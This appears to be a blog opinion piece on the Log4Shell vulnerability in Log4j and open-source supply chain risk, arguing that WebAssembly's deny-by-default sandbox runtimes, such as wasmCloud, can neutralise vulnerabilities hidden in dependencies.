With many applications depending on open-source software, how do we protect ourselves against the unknown vulnerabilities that undoubtedly exist? What measures can we put in place today to mitigate risk without eliminating the value of perfectly good software?
Much has already been written about how the exploit, known as “Log4Shell”, in the “Log4j” open source library (extremely widely used in server-side Java), has rocked the software industry.
An attacker “can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled” (from the CVE, logged on 26th Nov 2021, made public on Dec 9th).
Apache has given it the highest severity rating of 10, and some opinions describe it as even more serious than the HeartBleed vulnerability from 2012. I guess we’ll see.
In my opinion, the biggest problem will be the extremely long tail of updates to the hundreds of millions of affected systems, many of which will never be patched or reconfigured.
Understand where the responsibility rests
Interestingly, another CVE was introduced as part of the fix, and a third has been discovered in the past few days, simply because of the increased scrutiny.
I have to say that, from all accounts, the team has been amazing, working round the clock to fix these issues. Let’s not forget, that they are donating their time and effort for free.
Ultimately the maintainers are not the ones responsible. It’s the consumers of open source software that need to understand they take on all the responsibility when they use software whose source is open.
However, we’ve become very complacent about including open source packages that could easily be hiding undiscovered vulnerabilities.
There’s a tension between the value open source software brings and the risk it poses. We definitely don’t want to curtail the use of open source packages — they're just too valuable.
So what do we do?
Look for new ways to be proactive when it comes to security
In large organisations, especially banks, you would likely be required to provide a Software Bill of Materials (SBOM), and have source code and build artefacts scanned repeatedly for vulnerabilities.
This is known as Software Supply Chain Security. And it’s an industry in its own right.
Today, we build our applications using open source software and then we wrap them with the whole, even broader, Cyber Security industry in an effort to protect us from the harmful effects of malware that may be hiding in our dependencies.
All of this seems to me to be shutting the stable door after the horse has bolted.
What if we address the root cause, instead of the symptoms?
I think we should treat all our code as essentially non-trusted. Assume it’s already compromised. Imagine that it’s literally full of evil malware.
This is how we think about the software we run from the Web in our browsers.
Deny by default and WebAssembly
What I’m suggesting is that even the code we “write ourselves” invariably has (potentially thousands of) open source dependencies and so, in reality, it’s the same thing. Untrusted.
Importantly, in the browser, we also have WebAssembly (Wasm), which is a simple conceptual stack-based virtual machine that is also a secure sandbox for running untrusted binaries.
Now, here’s the thing. WebAssembly is becoming increasingly important out of the browser (i.e. server side) as a super secure runtime environment for cloud native microservice applications.
This is massive!
We are at the start of a new revolution where Cloud Native services are compiled to WebAssembly and hosted in WebAssembly runtimes.
They can contain as many open source packages as they like, and we can be pretty sure any vulnerabilities they contain will be completely impotent.
Take the Log4j issue, which depends on being able to call out to an LDAP server to download the code it’s going to execute on behalf of the attacker.
This would not be possible in a WebAssembly runtime, which has a deny-by-default sandbox model and does not even contain any code in the runtime to make the outgoing call in the first place.
Even if it were allowed to.
The future of the software industry
Code running in a Wasm runtime must be given very granular permissions in order to communicate with the world around it.
Permissions to read a specific directory on the filesystem, or to make a request to a specific API or website, for example.
I think WebAssembly will be scattered all around our future industry. And it’s important simply because it allows us to treat all our code as untrusted.
Even the code we write ourselves.
One great example of an up and coming server-side runtime for modern cloud native applications is wasmCloud — go check it out!